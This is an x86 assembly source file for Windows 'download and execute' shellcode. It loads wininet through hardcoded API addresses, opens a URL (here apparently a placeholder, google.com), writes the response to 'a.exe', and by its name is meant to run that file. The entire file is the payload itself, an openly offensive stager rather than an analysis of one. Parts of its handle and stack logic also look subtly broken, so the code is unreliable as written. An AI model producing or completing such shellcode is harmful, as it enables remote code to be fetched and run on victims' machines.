;DownloadNExec.asm 
;nasm -f elf DownloadNExec.asm
;ld -o DownloadNExec DownloadNExec.o
;objdump -d DownloadNExec

[BITS 32]

LoadWininet:
    Call GetLibHandle
    db 'wininet',0
GetLibHandle:
    mov ebx,0x75832884          ; ebx = &LoadLibraryA
    call ebx                    ; call LoadLibraryA
InternetOpen:
    xor eax,eax
    push eax
    push eax
    push eax
    push eax
    push eax
    mov ebx,0x75707ddc
    call ebx
InitUrlString:
    call InternetOpenUrl
    db 'http://www.google.com',0
InternetOpenUrl:
    pop ebx
    xor ecx,ecx
    push ecx
    push ecx
    push ecx
    push ecx
    push ebx
    push eax
    mov ebx,0x7570dbd8
    call ebx
InitFileStr:
    call CreateFile
    db 'a.exe',0
CreateFile:
    pop ebx
    xor eax,eax
    push eax
    mov al,0x82
    push eax
    mov al,0x02
    push eax
    xor al,al
    push eax
    push eax
    mov al,0x40
    sal eax,0x18
    push eax
    push ebx
    mov ebx,0x7583291c
    call ebx
    mov edi,eax
download_begin:
    xor eax,eax
    mov ax,0x010c
    sub esp,eax
    mov esi,esp
download_loop:
    lea ebx, [esi+0x04]
    push ebx
    mov ax,0x0104
    push eax
    lea eax, [esi+0x08]
    push eax
    push edi
    mov ecx,0x756fe264
    call ecx
    mov eax,[esi+0x04]
    test eax,eax
    jz download_finished
download_write_file:
    xor eax,eax
    push eax
    lea eax,[esi+0x04]
    push eax
    push dword [esi+0x04]
    lea eax,[esi+0x08]
    push eax
    push esi
    mov ecx,0x758311ec
    call ecx
    jmp download_loop
download_finished:
    push dword [ebp + 0x3c]
    mov ecx,0x758305d7
    call ecx
    xor eax, eax
    mov ax, 0x010c
    add esp, eax
EndShellCode:
    jmp EndShellCode
